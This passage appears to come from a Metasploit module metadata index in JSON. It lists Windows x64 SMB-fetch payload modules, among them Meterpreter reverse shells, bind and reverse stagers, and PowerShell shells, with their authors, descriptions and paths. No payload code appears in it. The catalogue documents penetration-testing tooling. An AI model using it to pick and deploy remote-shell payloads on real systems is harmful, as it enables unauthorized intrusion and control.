|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter_reverse_http",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter_reverse_https": {
|
||||
"name": "SMB Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_https",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter_reverse_https",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter_reverse_https",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp": {
|
||||
"name": "SMB Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/meterpreter_reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64",
|
||||
"fullname": "payload/cmd/windows/smb/x64/meterpreter_reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/meterpreter_reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/meterpreter_reverse_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/bind_ipv6_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/bind_ipv6_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/bind_ipv6_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/bind_named_pipe": {
|
||||
"name": "SMB Fetch, Windows x64 Bind Named Pipe Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/bind_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/bind_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/bind_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/bind_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/bind_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/bind_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/bind_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/bind_tcp_rc4": {
|
||||
"name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/bind_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/bind_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/bind_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/bind_tcp_uuid": {
|
||||
"name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/bind_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/bind_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/bind_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/bind_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/reverse_named_pipe": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse Named Pipe (SMB) Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/reverse_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/reverse_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/reverse_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/reverse_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/reverse_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/reverse_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/reverse_tcp_rc4": {
|
||||
"name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/reverse_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/reverse_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/peinject/reverse_tcp_uuid": {
|
||||
"name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/peinject/reverse_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/peinject/reverse_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/peinject/reverse_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/peinject",
|
||||
"stager_refname": "windows/x64/reverse_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/pingback_reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Pingback, Reverse TCP Inline",
|
||||
"fullname": "payload/cmd/windows/smb/x64/pingback_reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"bwatters-r7"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/pingback_reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/pingback_reverse_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/powershell_bind_tcp": {
|
||||
"name": "SMB Fetch",
|
||||
"fullname": "payload/cmd/windows/smb/x64/powershell_bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"Ben Turner",
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/powershell_bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/powershell_bind_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/powershell_reverse_tcp": {
|
||||
"name": "SMB Fetch",
|
||||
"fullname": "payload/cmd/windows/smb/x64/powershell_reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"Ben Turner",
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/powershell_reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/powershell_reverse_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/powershell_reverse_tcp_ssl": {
|
||||
"name": "SMB Fetch",
|
||||
"fullname": "payload/cmd/windows/smb/x64/powershell_reverse_tcp_ssl",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"Ben Turner",
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/powershell_reverse_tcp_ssl",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/powershell_reverse_tcp_ssl",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/bind_ipv6_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/bind_ipv6_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/bind_ipv6_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
